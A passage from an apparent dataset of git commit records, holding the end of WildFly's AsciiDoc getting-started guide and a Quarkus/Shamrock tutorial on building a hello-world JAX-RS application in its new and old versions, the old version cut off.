Artemis) by\ndefault. If you want to use messaging, make sure you start the server\n using the \"Full Platform\" configuration.\n\nThis document provides a quick overview on how to download and get\nstarted using WildFly {wildflyVersion} for your application development. 
For in-depth\ncontent on administrative features, refer to the WildFly {wildflyVersion} Admin Guide.\n\n[[requirements]]\n=== Requirements\n\n* Java SE 8 or later. We recommend that you use the latest available update\nof the current long-term support Java release.\n\n\n[[installation-options]]\n=== Installation Options\n\nThere are a number of ways you can install WildFly, including unzipping our traditional download zip, provisioning a\ncustom installation using Galleon, or building a bootable jar. The link:Installation_Guide{outfilesuffix}[Installation Guide]\nhelps you identify the kind of WildFly installation that best fits your application's deployment needs. In this guide\nwe'll focus on the common approach of installing the download zip.\n\n[[download]]\n=== Download\n\nWildFly {wildflyVersion} distributions can be obtained from:\n\nhttp:\/\/www.wildfly.org\/downloads\/[wildfly.org\/downloads]\n\nWildFly {wildflyVersion} provides a single distribution available in zip or tar file\nformats.\n\n* *wildfly-{wildflyVersion}.0.0.Final.zip*\n* *wildfly-{wildflyVersion}.0.0.Final.tar.gz*\n\n[[installation]]\n=== Installation\n\nSimply extract your chosen download to the directory of your choice. You\ncan install WildFly {wildflyVersion} on any operating system that supports the zip or\ntar formats. Refer to the Release Notes for additional information\nrelated to the release.\n\n[[wildfly---a-quick-tour]]\n=== WildFly - A Quick Tour\n\nNow that you've downloaded WildFly {wildflyVersion}, the next thing to discuss is the\nlayout of the distribution and explore the server directory structure,\nkey configuration files, log files, user deployments and so on. It's\nworth familiarizing yourself with the layout so that you'll be able to\nfind your way around when it comes to deploying your own applications.\n\n[[wildfly-directory-structure]]\n==== WildFly Directory Structure\n\n[cols=\",\",options=\"header\"]\n|=======================================================================\n|DIRECTORY |DESCRIPTION\n\n|appclient |Configuration files, deployment content, and writable areas\nused by the application client container run from this installation.\n\n|bin |Start up scripts, start up configuration files and various command\nline utilities like Vault, add-user and Java diagnostic reportavailable\nfor Unix and Windows environments\n\n|bin\/client |Contains a client jar for use by non-maven based clients.\n\n|docs\/schema |XML schema definition files\n\n|docs\/examples\/configs |Example configuration files representing\nspecific use cases\n\n|domain |Configuration files, deployment content, and writable areas\nused by the domain mode processes run from this installation.\n\n|modules |WildFly is based on a modular classloading architecture.\nThe various modules used in the server are stored here.\n\n|standalone |Configuration files, deployment content, and writable areas\nused by the single standalone server run from this installation.\n\n|welcome-content |Default Welcome Page content\n|=======================================================================\n\n[[standalone-directory-structure]]\n===== Standalone Directory Structure\n\nIn \" *_standalone_* \" mode each WildFly {wildflyVersion} server instance is an\nindependent process (similar to previous JBoss AS versions; e.g., 3, 4,\n5, or 6). 
The configuration files, deployment content and writable areas\nused by the single standalone server run from a WildFly installation are\nfound in the following subdirectories under the top level \"standalone\"\ndirectory:\n\n[cols=\",\",options=\"header\"]\n|=======================================================================\n|DIRECTORY |DESCRIPTION\n\n|configuration |Configuration files for the standalone server that runs\noff of this installation. All configuration information for the running\nserver is located here and is the single place for configuration\nmodifications for the standalone server.\n\n|data |Persistent information written by the server to survive a restart\nof the server\n\n|deployments |End user deployment content can be placed in this\ndirectory for automatic detection and deployment of that content into\nthe server's runtime.NOTE: The server's management API is recommended\nfor installing deployment content. File system based deployment scanning\ncapabilities remain for developer convenience.\n\n|lib\/ext |Location for installed library jars referenced by applications\nusing the Extension-List mechanism\n\n|log |standalone server log files\n\n|tmp |location for temporary files written by the server\n\n|tmp\/auth |Special location used to exchange authentication tokens with\nlocal clients so they can confirm that they are local to the running AS\nprocess.\n|=======================================================================\n\n[[domain-directory-structure]]\n===== Domain Directory Structure\n\nA key feature of WildFly {wildflyVersion} is the managing multiple servers from a\nsingle control point. A collection of multiple servers are referred to\nas a \" *_domain_* \". Domains can span multiple physical (or virtual)\nmachines with all WildFly instances on a given host under the control of\na Host Controller process. The Host Controllers interact with the Domain\nController to control the lifecycle of the WildFly instances running on\nthat host and to assist the Domain Controller in managing them. The\nconfiguration files, deployment content and writeable areas used by\ndomain mode processes run from a WildFly installation are found in the\nfollowing subdirectories under the top level \"domain\" directory:\n\n[cols=\",\",options=\"header\"]\n|=======================================================================\n|DIRECTORY |DESCRIPTION\n\n|configuration |Configuration files for the domain and for the Host\nController and any servers running off of this installation. All\nconfiguration information for the servers managed wtihin the domain is\nlocated here and is the single place for configuration information.\n\n|content |an internal working area for the Host Controller that controls\nthis installation. This is where it internally stores deployment\ncontent. This directory is not meant to be manipulated by end users.Note\nthat \"domain\" mode does not support deploying content based on scanning\na file system.\n\n|lib\/ext |Location for installed library jars referenced by applications\nusing the Extension-List mechanism\n\n|log |Location where the Host Controller process writes its logs. The\nProcess Controller, a small lightweight process that actually spawns the\nother Host Controller process and any Application Server processes also\nwrites a log here.\n\n|servers |Writable area used by each Application Server instance that\nruns from this installation. 
Each Application Server instance will have\nits own subdirectory, created when the server is first started. In each\nserver's subdirectory there will be the following subdirectories:data --\ninformation written by the server that needs to survive a restart of the\nserverlog -- the server's log filestmp -- location for temporary files\nwritten by the server\n\n|tmp |location for temporary files written by the server\n\n|tmp\/auth |Special location used to exchange authentication tokens with\nlocal clients so they can confirm that they are local to the running AS\nprocess.\n|=======================================================================\n\n[[wildfly-10-configurations]]\n==== WildFly {wildflyVersion} Configurations\n\n[[standalone-server-configurations]]\n===== Standalone Server Configurations\n\n* standalone.xml (_default_)\n** Jakarta web profile certified configuration with\nthe required technologies plus those noted in the table above.\n\n* standalone-ha.xml\n** Jakarta web profile certified configuration with\nhigh availability\n\n* standalone-full.xml\n** Jakarta Full Platform certified configuration\nincluding all the required technologies\n\n* standalone-full-ha.xml\n** Jakarta Full Platform certified configuration with\nhigh availability\n\n* standalone-microprofile.xml\n** A configuration oriented toward microservices, providing our\nMicroProfile platform implementations combined with Jakarta RESTful Web Services and\ntechnologies Jakarta RESTful Web Services applications commonly use to integrate with\nexternal services.\n\n* standalone-microprofile-ha.xml\n** A configuration oriented toward microservices, similar to\n_standalone-microprofile.xml_ but with support for high availability\nweb sessions and distributed Hibernate second level caching.\n\n[[domain-server-configurations]]\n===== Domain Server Configurations\n\n* domain.xml\n** Jakarta full and web profiles available with or\nwithout high availability\n\nImportant to note is that the *_domain_* and *_standalone_* modes\ndetermine how the servers are managed not what capabilities they\nprovide.\n\n[[starting-wildfly-10]]\n==== Starting WildFly {wildflyVersion}\n\nTo start WildFly {wildflyVersion} using the default web profile configuration in \"\n_standalone_\" mode, change directory to $JBOSS_HOME\/bin.\n\n[source,options=\"nowrap\"]\n----\n.\/standalone.sh\n----\n\nTo start the default web profile configuration using domain management\ncapabilities,\n\n[source,options=\"nowrap\"]\n----\n.\/domain.sh\n----\n\n[[starting-wildfly-with-an-alternate-configuration]]\n==== Starting WildFly with an Alternate Configuration\n\nIf you choose to start your server with one of the other provided\nconfigurations, they can be accessed by passing the --server-config\nargument with the server-config file to be used.\n\nTo use the Full Platform with clustering capabilities, use the following\nsyntax from $JBOSS_HOME\/bin:\n\n[source,options=\"nowrap\"]\n----\n.\/standalone.sh --server-config=standalone-full-ha.xml\n----\n\nSimilarly to start an alternate configuration in _domain_ mode:\n\n[source,options=\"nowrap\"]\n----\n.\/domain.sh --domain-config=my-domain-configuration.xml\n----\n\nAlternatively, you can create your own selecting the additional\nsubsystems you want to add, remove, or modify.\n\n[[test-your-installation]]\n===== Test Your Installation\n\nAfter executing one of the above commands, you should see output similar\nto what's shown 
below.\n\n[source,options=\"nowrap\"]\n----\n=========================================================================\n\u00a0\n JBoss Bootstrap Environment\n\u00a0\n JBOSS_HOME: \/opt\/wildfly-10.0.0.Final\n\u00a0\n JAVA: java\n\u00a0\n JAVA_OPTS: -server -Xms64m -Xmx512m -XX:MetaspaceSize=96M -XX:MaxMetaspaceSize=256m -Djava.net.preferIPv4Stack=true -Djboss.modules.system.pkgs=com.yourkit,org.jboss.byteman -Djava.awt.headless=true\n\u00a0\n=========================================================================\n\u00a0\n11:46:11,161 INFO [org.jboss.modules] (main) JBoss Modules version 1.5.1.Final\n11:46:11,331 INFO [org.jboss.msc] (main) JBoss MSC version 1.2.6.Final\n11:46:11,391 INFO [org.jboss.as] (MSC service thread 1-6) WFLYSRV0049: WildFly Full 10.0.0.Final (WildFly Core 2.0.10.Final) starting\n<snip>\n11:46:14,300 INFO [org.jboss.as] (Controller Boot Thread) WFLYSRV0025: WildFly Full 10.0.0.Final (WildFly Core 2.0.10.Final) started in 1909ms - Started 267 of 553 services (371 services are lazy, passive or on-demand)\n----\n\nAs with previous WildFly releases, you can point your browser to\n*_http:\/\/localhost:8080_* (if using the default configured http port)\nwhich brings you to the Welcome Screen:\n\nimage:wildfly.png[images\/wildfly.png]\n\nFrom here you can access links to the WildFly community documentation\nset, stay up-to-date on the latest project information, have a\ndiscussion in the user forum and access the enhanced web-based\nAdministration Console. Or, if you uncover a defect while using WildFly,\nreport an issue to inform us (attached patches will be reviewed). This\nlanding page is recommended for convenient access to information about\nWildFly {wildflyVersion} but can easily be replaced with your own if desired.\n\n[[managing-your-wildfly-10]]\n==== Managing your WildFly {wildflyVersion}\n\nWildFly {wildflyVersion} offers two administrative mechanisms for managing your\nrunning instance:\n\n* web-based Administration Console\n* command-line interface\n\n===== Authentication\n\nBy default WildFly {wildflyVersion} is now distributed with security enabled for the\nmanagement interfaces, this means that before you connect using the\nadministration console or remotely using the CLI you will need to add a\nnew user, this can be achieved simply by using the _add-user.sh_ script\nin the bin folder.\n\nAfter starting the script you will be guided through the process to add\na new user: -\n\n[source,options=\"nowrap\"]\n----\n.\/add-user.sh\nWhat type of user do you wish to add?\n a) Management User (mgmt-users.properties)\n b) Application User (application-users.properties)\n(a):\n----\n\nIn this case a new user is being added for the purpose of managing the\nservers so select option a.\n\nYou will then be prompted to enter the details of the new user being\nadded: -\n\n[source,options=\"nowrap\"]\n----\nEnter the details of the new user to add.\nRealm (ManagementRealm) :\nUsername :\nPassword :\nRe-enter Password :\n----\n\nIt is important to leave the name of the realm as 'ManagementRealm' as\nthis needs to match the name used in the server's configuration, for the\nremaining fields enter the new username, password and password\nconfirmation.\n\nProvided there are no errors in the values entered you will then be\nasked to confirm that you want to add the user, the user will be written\nto the properties files used for authentication and a confirmation\nmessage will be displayed.\n\nThe modified time of the properties files are inspected at the time of\nauthentication 
and the files reloaded if they have changed, for this\nreason you do not need to re-start the server after adding a new user.\n\n[[administration-console]]\n===== Administration Console\n\nTo access the web-based Administration Console, simply follow the link\nfrom the Welcome Screen. To directly access the Management Console,\npoint your browser at:\n\n*_http:\/\/localhost:9990\/console_*\n\nNOTE: port 9990 is the default port configured.\n\n[source,xml,options=\"nowrap\"]\n----\n<management-interfaces>\n <native-interface security-realm=\"ManagementRealm\">\n <socket-binding native=\"management-native\"\/>\n <\/native-interface>\n <http-interface security-realm=\"ManagementRealm\">\n <socket-binding http=\"management-http\"\/>\n <\/http-interface>\n<\/management-interfaces>\n----\n\nIf you modify the _management-http_ socket binding in your running\nconfiguration: adjust the above command accordingly. If such\nmodifications are made, then the link from the Welcome Screen will also\nbe inaccessible.\n\nIf you have not yet added at least one management user an error page\nwill be displayed asking you to add a new user, after a user has been\nadded you can click on the 'Try Again' link at the bottom of the error\npage to try connecting to the administration console again.\n\n[[command-line-interface]]\n===== Command-Line Interface\n\nIf you prefer to manage your server from the command line (or batching),\nthe _jboss-cli.sh_ script provides the same capabilities available via\nthe web-based UI. This script is accessed from $JBOSS_HOME\/bin\ndirectory; e.g.,\n\n[source,options=\"nowrap\"]\n----\n$JBOSS_HOME\/bin\/jboss-cli.sh --connect\nConnected to standalone controller at localhost:9990\n----\n\nNotice if no host or port information provided, it will default to\nlocalhost:9990.\n\nWhen running locally to the WildFly process the CLI will silently\nauthenticate against the server by exchanging tokens on the file system,\nthe purpose of this exchange is to verify that the client does have\naccess to the local file system. If the CLI is connecting to a remote\nWildFly installation then you will be prompted to enter the username and\npassword of a user already added to the realm.\n\nOnce connected you can add, modify, remove resources and deploy or\nundeploy applications. For a complete list of commands and command\nsyntax, type *_help_* once connected.\n\n[[modifying-the-example-datasource]]\n==== Modifying the Example DataSource\n\nAs with previous JBoss application server releases, a default data\nsource, *_ExampleDS_* , is configured using the embedded H2 database for\ndeveloper convenience. There are two ways to define datasource\nconfigurations:\n\n1. as a module\n2. as a deployment\n\nIn the provided configurations, H2 is configured as a module. The module\nis located in the $JBOSS_HOME\/modules\/com\/h2database\/h2 directory. 
The\nH2 datasource configuration is shown below.\n\n[source,xml,options=\"nowrap\"]\n----\n<subsystem xmlns=\"urn:jboss:domain:datasources:1.0\">\n <datasources>\n <datasource jndi-name=\"java:jboss\/datasources\/ExampleDS\" pool-name=\"ExampleDS\">\n <connection-url>jdbc:h2:mem:test;DB_CLOSE_DELAY=-1<\/connection-url>\n <driver>h2<\/driver>\n <pool>\n <min-pool-size>10<\/min-pool-size>\n <max-pool-size>20<\/max-pool-size>\n <prefill>true<\/prefill>\n <\/pool>\n <security>\n <user-name>sa<\/user-name>\n <password>sa<\/password>\n <\/security>\n <\/datasource>\n <xa-datasource\u00a0jndi-name=\"java:jboss\/datasources\/ExampleXADS\"\u00a0pool-name=\"ExampleXADS\">\n \u00a0<driver>h2<\/driver>\n \u00a0\u00a0\u00a0 <xa-datasource-property\u00a0name=\"URL\">jdbc:h2:mem:test<\/xa-datasource-property>\n <xa-pool>\n <min-pool-size>10<\/min-pool-size>\n <max-pool-size>20<\/max-pool-size>\n <prefill>true<\/prefill>\n <\/xa-pool>\n \u00a0\u00a0\u00a0 <security>\n \u00a0\u00a0\u00a0\u00a0\u00a0 <user-name>sa<\/user-name>\n \u00a0\u00a0\u00a0\u00a0\u00a0 <password>sa<\/password>\n \u00a0\u00a0\u00a0 <\/security>\n \u00a0 <\/xa-datasource>\n <drivers>\n \u00a0<driver name=\"h2\" module=\"com.h2database.h2\">\n <xa-datasource-class>org.h2.jdbcx.JdbcDataSource<\/xa-datasource-class>\n <\/driver>\n <\/drivers>\n <\/datasources>\n<\/subsystem>\n----\n\nThe datasource subsystem is provided by the\nhttp:\/\/www.jboss.org\/ironjacamar[IronJacamar] project. For a detailed\ndescription of the available configuration properties, please consult\nthe project documentation.\n\n* IronJacamar homepage: http:\/\/www.jboss.org\/ironjacamar\n* Project Documentation: http:\/\/www.jboss.org\/ironjacamar\/docs\n* Schema description:\nhttp:\/\/docs.jboss.org\/ironjacamar\/userguide\/1.0\/en-US\/html\/deployment.html#deployingds_descriptor\n\n[[configure-logging-in-wildfly]]\n===== Configure Logging in WildFly\n\nWildFly logging can be configured with the web console or the command\nline interface. You can get more detail on the link:Admin_Guide{outfilesuffix}#Logging[Logging\nConfiguration] page.\n\nTurn on debugging for a specific category with CLI:\n\n[source,options=\"nowrap\"]\n----\n\/subsystem=logging\/logger=org.jboss.as:add(level=DEBUG)\n----\n\nBy default the `server.log` is configured to include all levels in it's\nlog output. 
In the above example we changed the console to also display\ndebug messages.\n","returncode":0,"stderr":"","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"ecd64a548c2f8484fda6d077f8b7755edc6c2b8f","subject":"sync maven versions in pom.xml, getting-started-guide.adoc","message":"sync maven versions in pom.xml, getting-started-guide.adoc\n\nFixes #502","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/getting-started-guide.adoc","new_file":"docs\/src\/main\/asciidoc\/getting-started-guide.adoc","new_contents":"= {project-name} - Creating Your First Application\n\n:toc: macro\n:toclevels: 4\n:doctype: book\n:icons: font\n:docinfo1:\n\n:numbered:\n:sectnums:\n:sectnumlevels: 4\n\n\nLearn how to create a Hello World Shamrock app.\nThis guide covers:\n\n* Bootstrapping an application\n* Creating a JAX-RS endpoint\n* Injecting beans\n* Functional tests\n* Packaging of the application\n\n== Prerequisites\n\nTo complete this guide, you need:\n\n* less than 15 minutes\n* an IDE\n* JDK 1.8+ installed with `JAVA_HOME` configured appropriately\n* Apache Maven 3.5.3+\n\ninclude::.\/maven-config.adoc[tag=repositories]\n\n== Architecture\n\nIn this guide, we create a straightforward application serving a `hello` endpoint. To demonstrate\ndependency injection this endpoint uses a `greeting` bean.\n\nimage::getting-started-architecture.png[alt=Architecture,width=640,height=480]\n\nThis guide also covers the testing of the endpoint.\n\n== Solution\n\nWe recommend you to follow the instructions in the next sections and create the application step by step.\nHowever, you can go right to the completed example.\n\nClone the Git repository: `git clone https:\/\/github.com\/protean-project\/quickstarts.git`, or download an https:\/\/github.com\/protean-project\/quickstarts\/archive\/master.zip[archive].\n\nThe solution is located in the `getting-started` directory.\n\n== Creating the pom file\n\nIn your favorite IDE, create a new Maven project.\nIt should generate a `pom.xml` file with a content similar to:\n\n[source,xml]\n----\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<project>\n <modelVersion>4.0.0<\/modelVersion>\n\n <groupId>org.acme<\/groupId>\n <artifactId>shamrock-quickstart<\/artifactId>\n <version>1.0-SNAPSHOT<\/version>\n\n<\/project>\n----\n\nAdd the Shamrock Maven plugin to the `pom.xml` file:\n\n[source,xml,subs=attributes+]\n----\n<properties>\n <shamrock.version>{shamrock-version}<\/shamrock.version>\n <surefire.version>{surefire-version}<\/surefire.version>\n<\/properties>\n\n<dependencyManagement>\n <dependencies>\n <dependency>\n <groupId>org.jboss.shamrock<\/groupId>\n <artifactId>shamrock-bom<\/artifactId>\n <version>${shamrock.version}<\/version>\n <type>pom<\/type>\n <scope>import<\/scope>\n <\/dependency>\n <\/dependencies>\n<\/dependencyManagement>\n\n<build>\n <plugins>\n <plugin>\n <groupId>org.jboss.shamrock<\/groupId>\n <artifactId>shamrock-maven-plugin<\/artifactId>\n <version>${shamrock.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>build<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <\/plugin>\n <\/plugins>\n<\/build>\n----\n\n[NOTE]\n.What's Shamrock?\n====\nShamrock can be seen as {project-name} core.\n====\n\nAs we are going to create a JAX-RS endpoint, you also need to add the following dependencies:\n\n[source,xml]\n----\n<dependencies>\n <dependency>\n <groupId>org.jboss.shamrock<\/groupId>\n <artifactId>shamrock-jaxrs-deployment<\/artifactId>\n 
<\/dependency>\n <dependency>\n <groupId>org.jboss.shamrock<\/groupId>\n <artifactId>shamrock-arc-deployment<\/artifactId>\n <\/dependency>\n<\/dependencies>\n----\n\n[NOTE]\n.What's ArC?\n====\nArC is a CDI-based dependency injection solution - see also link:cdi-reference.html[Contexts and Dependency Injection].\n====\n\n== Creating the Application class\n\nIt's now time to create the `Application` class, create the `src\/main\/java\/org\/acme\/quickstart\/MyApplication.java` file with the following content:\n\n[source,java]\n----\npackage org.acme.quickstart;\n\nimport javax.ws.rs.ApplicationPath;\nimport javax.ws.rs.core.Application;\n\n@ApplicationPath(\"\/app\")\npublic class MyApplication extends Application {\n\n}\n----\n\n=== Creating the JAX-RS resource\n\nCreate the `src\/main\/java\/org\/acme\/quickstart\/GreetingResource.java` file with the following content:\n\n[source,java]\n----\npackage org.acme.quickstart;\n\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\n\n@Path(\"\/hello\")\npublic class GreetingResource {\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n public String hello() {\n return \"hello\";\n }\n}\n----\n\n== Running the application\n\nNow we are ready to run our application.\nUse: `mvn compile shamrock:dev`:\n\n[source, text]\n----\n[INFO] --------------------< org.acme:shamrock-quickstart >--------------------\n[INFO] Building shamrock-quickstart 1.0-SNAPSHOT\n[INFO] --------------------------------[ jar ]---------------------------------\n[INFO] \n[INFO] --- maven-resources-plugin:2.6:resources (default-resources) @ shamrock-quickstart ---\n[INFO] Using 'UTF-8' encoding to copy filtered resources.\n[INFO] skip non existing resourceDirectory \/opt\/source\/protean\/quickstarts\/getting-started\/src\/main\/resources\n[INFO] \n[INFO] --- maven-compiler-plugin:3.1:compile (default-compile) @ shamrock-quickstart ---\n[INFO] Nothing to compile - all classes are up to date\n[INFO] \n[INFO] --- shamrock-maven-plugin:0.4.0:dev (default-cli) @ shamrock-quickstart ---\nINFO [o.j.s.u.r.UndertowDeploymentTemplate] (main) Starting Undertow on port 8080\nINFO [o.xnio] (main) XNIO version 3.6.5.Final\nINFO [o.x.nio] (main) XNIO NIO Implementation Version 3.6.5.Final\nINFO [o.j.threads] (main) JBoss Threads version 3.0.0.Alpha4\nINFO [o.j.s.d.ShamrockAugmentor] (main) Beginning shamrock augmentation\nINFO [o.j.s.d.ShamrockAugmentor] (main) Shamrock augmentation completed in 322ms\nINFO [o.j.r.r.i18n] (main) RESTEASY002225: Deploying javax.ws.rs.core.Application: class org.acme.quickstart.MyApplication\nINFO [o.j.shamrock] (main) Shamrock started in 697.982ms\n----\n\nOnce started, you can request the provided endpoint:\n\n```\n$ curl http:\/\/localhost:8080\/app\/hello\nhello\n```\n\nHit `CTRL+C` to stop the application.\n\n== Using injection\n\nLet's add a companion bean.\nCreate the `src\/main\/java\/org\/acme\/quickstart\/GreetingService.java` file with the following content:\n\n[source, java]\n----\npackage org.acme.quickstart;\n\nimport javax.enterprise.context.ApplicationScoped;\n\n@ApplicationScoped\npublic class GreetingService {\n\n public String greeting(String name) {\n return \"hello \" + name;\n }\n\n}\n----\n\nEdit the `GreetingResource` class to inject the `GreetingService` and create a new endpoint using it:\n\n[source, java]\n----\npackage org.acme.quickstart;\n\nimport javax.inject.Inject;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.PathParam;\nimport 
javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\n\n@Path(\"\/hello\")\npublic class GreetingResource {\n\n @Inject\n GreetingService service;\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n @Path(\"\/greeting\/{name}\")\n public String greeting(@PathParam(\"name\") String name) {\n return service.greeting(name);\n }\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n public String hello() {\n return \"hello\";\n }\n}\n----\n\nStart the application and check that http:\/\/localhost:8080\/app\/hello\/greeting\/shamrock returns `hello shamrock`.\n\n\n\n== Testing\n\nAll right, so far so good, but wouldn't it be better with a few tests, just in case.\n\nEdit the `pom.xml` file to add the 2 following dependencies:\n\n[source,xml,subs=attributes+]\n----\n<dependency>\n <groupId>org.jboss.shamrock<\/groupId>\n <artifactId>shamrock-junit<\/artifactId>\n <version>${shamrock.version}<\/version>\n <scope>test<\/scope>\n<\/dependency>\n<dependency>\n <groupId>io.rest-assured<\/groupId>\n <artifactId>rest-assured<\/artifactId>\n <version>{restassured-version}<\/version>\n <scope>test<\/scope>\n<\/dependency>\n----\n\nThen, create the `src\/test\/java\/org\/acme\/quickstart\/GreetingResourceTest.java` with the following content:\n\n[source,java]\n----\npackage org.acme.quickstart;\n\nimport org.jboss.shamrock.test.ShamrockTest;\nimport org.junit.Test;\nimport org.junit.runner.RunWith;\n\nimport java.util.UUID;\n\nimport static io.restassured.RestAssured.given;\nimport static org.hamcrest.CoreMatchers.is;\n\n@RunWith(ShamrockTest.class) \/\/ <1>\npublic class GreetingResourceTest {\n\n @Test\n public void testHelloEndpoint() {\n given()\n .when().get(\"app\/hello\")\n .then()\n .statusCode(200) \/\/ <2>\n .body(is(\"hello\"));\n }\n\n @Test\n public void testGreetingEndpoint() {\n String uuid = UUID.randomUUID().toString();\n given()\n .pathParam(\"name\", uuid)\n .when().get(\"app\/hello\/greeting\/{name}\")\n .then()\n .statusCode(200)\n .body(is(\"hello \" + uuid));\n }\n\n}\n----\n<1> By using the `ShamrockTest` runner, you instruct JUnit to start the application before the tests.\n<2> Check the HTTP response status code and content\n\nThese tests use http:\/\/rest-assured.io\/[RestAssured], but feel free to use your favorite library.\n\nYou can run the test from your IDE directly (be sure you stopped the application first), or from Maven using: `mvn test`.\n\n== Packaging and run the application\n\nThe application is packaged using `mvn package`.\nIt produces 2 jar files:\n\n* `shamrock-quickstart-1.0-SNAPSHOT.jar` - containing just the classes and resources of the projects, it's the regular\nartifact produced by the Maven build;\n* `shamrock-quickstart-1.0-SNAPSHOT-runner.jar` - being an executable _\u00fcber-jar_.\nIt embeds all the dependencies required to run the application.\n\nYou can run the application using: `java -jar target\/shamrock-quickstart-1.0-SNAPSHOT-runner.jar`\n\n== Async\n\nThe resource can also use `CompletionStage` as return type to handle asynchronous actions:\n\n[source,java]\n----\n@GET\n@Produces(MediaType.TEXT_PLAIN)\npublic CompletionStage<String> hello() {\n return CompletableFuture.supplyAsync(() -> {\n return \"hello\";\n });\n}\n----\n\nThe async version of the code is available in the https:\/\/github.com\/protean-project\/quickstarts[Github] repository, in the `getting-started-async` directory.\n\n== What's next?\n\nThis guide covered the creation of an application using Shamrock.\nHowever, there is much more.\nWe recommend continuing the journey with the 
link:building-native-image-guide.html[building a native image guide], where you learn about the native executable creation and the packaging in a container.\n\nIn addition, the link:ide-configuration.html[developer guide] document explains how to:\n\n* scaffold a project in a single command line,\n* enable the _development model_ (hot reload)\n* import the project in your favorite IDE\n\n","old_contents":"= {project-name} - Creating Your First Application\n\n:toc: macro\n:toclevels: 4\n:doctype: book\n:icons: font\n:docinfo1:\n\n:numbered:\n:sectnums:\n:sectnumlevels: 4\n\n\nLearn how to create a Hello World Shamrock app.\nThis guide covers:\n\n* Bootstrapping an application\n* Creating a JAX-RS endpoint\n* Injecting beans\n* Functional tests\n* Packaging of the application\n\n== Prerequisites\n\nTo complete this guide, you need:\n\n* less than 15 minutes\n* an IDE\n* JDK 1.8+ installed with `JAVA_HOME` configured appropriately\n* Apache Maven 3.5+\n\ninclude::.\/maven-config.adoc[tag=repositories]\n\n== Architecture\n\nIn this guide, we create a straightforward application serving a `hello` endpoint. To demonstrate\ndependency injection this endpoint uses a `greeting` bean.\n\nimage::getting-started-architecture.png[alt=Architecture,width=640,height=480]\n\nThis guide also covers the testing of the endpoint.\n\n== Solution\n\nWe recommend you to follow the instructions in the next sections and create the application step by step.\nHowever, you can go right to the completed example.\n\nClone the Git repository: `git clone https:\/\/github.com\/protean-project\/quickstarts.git`, or download an https:\/\/github.com\/protean-project\/quickstarts\/archive\/master.zip[archive].\n\nThe solution is located in the `getting-started` directory.\n\n== Creating the pom file\n\nIn your favorite IDE, create a new Maven project.\nIt should generate a `pom.xml` file with a content similar to:\n\n[source,xml]\n----\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<project>\n <modelVersion>4.0.0<\/modelVersion>\n\n <groupId>org.acme<\/groupId>\n <artifactId>shamrock-quickstart<\/artifactId>\n <version>1.0-SNAPSHOT<\/version>\n\n<\/project>\n----\n\nAdd the Shamrock Maven plugin to the `pom.xml` file:\n\n[source,xml,subs=attributes+]\n----\n<properties>\n <shamrock.version>{shamrock-version}<\/shamrock.version>\n <surefire.version>{surefire-version}<\/surefire.version>\n<\/properties>\n\n<dependencyManagement>\n <dependencies>\n <dependency>\n <groupId>org.jboss.shamrock<\/groupId>\n <artifactId>shamrock-bom<\/artifactId>\n <version>${shamrock.version}<\/version>\n <type>pom<\/type>\n <scope>import<\/scope>\n <\/dependency>\n <\/dependencies>\n<\/dependencyManagement>\n\n<build>\n <plugins>\n <plugin>\n <groupId>org.jboss.shamrock<\/groupId>\n <artifactId>shamrock-maven-plugin<\/artifactId>\n <version>${shamrock.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>build<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <\/plugin>\n <\/plugins>\n<\/build>\n----\n\n[NOTE]\n.What's Shamrock?\n====\nShamrock can be seen as {project-name} core.\n====\n\nAs we are going to create a JAX-RS endpoint, you also need to add the following dependencies:\n\n[source,xml]\n----\n<dependencies>\n <dependency>\n <groupId>org.jboss.shamrock<\/groupId>\n <artifactId>shamrock-jaxrs-deployment<\/artifactId>\n <\/dependency>\n <dependency>\n <groupId>org.jboss.shamrock<\/groupId>\n <artifactId>shamrock-arc-deployment<\/artifactId>\n <\/dependency>\n<\/dependencies>\n----\n\n[NOTE]\n.What's ArC?\n====\nArC is a 
CDI-based dependency injection solution - see also link:cdi-reference.html[Contexts and Dependency Injection].\n====\n\n== Creating the Application class\n\nIt's now time to create the `Application` class, create the `src\/main\/java\/org\/acme\/quickstart\/MyApplication.java` file with the following content:\n\n[source,java]\n----\npackage org.acme.quickstart;\n\nimport javax.ws.rs.ApplicationPath;\nimport javax.ws.rs.core.Application;\n\n@ApplicationPath(\"\/app\")\npublic class MyApplication extends Application {\n\n}\n----\n\n=== Creating the JAX-RS resource\n\nCreate the `src\/main\/java\/org\/acme\/quickstart\/GreetingResource.java` file with the following content:\n\n[source,java]\n----\npackage org.acme.quickstart;\n\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\n\n@Path(\"\/hello\")\npublic class GreetingResource {\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n public String hello() {\n return \"hello\";\n }\n}\n----\n\n== Running the application\n\nNow we are ready to run our application.\nUse: `mvn compile shamrock:dev`:\n\n[source, text]\n----\n[INFO] --------------------< org.acme:shamrock-quickstart >--------------------\n[INFO] Building shamrock-quickstart 1.0-SNAPSHOT\n[INFO] --------------------------------[ jar ]---------------------------------\n[INFO] \n[INFO] --- maven-resources-plugin:2.6:resources (default-resources) @ shamrock-quickstart ---\n[INFO] Using 'UTF-8' encoding to copy filtered resources.\n[INFO] skip non existing resourceDirectory \/opt\/source\/protean\/quickstarts\/getting-started\/src\/main\/resources\n[INFO] \n[INFO] --- maven-compiler-plugin:3.1:compile (default-compile) @ shamrock-quickstart ---\n[INFO] Nothing to compile - all classes are up to date\n[INFO] \n[INFO] --- shamrock-maven-plugin:0.4.0:dev (default-cli) @ shamrock-quickstart ---\nINFO 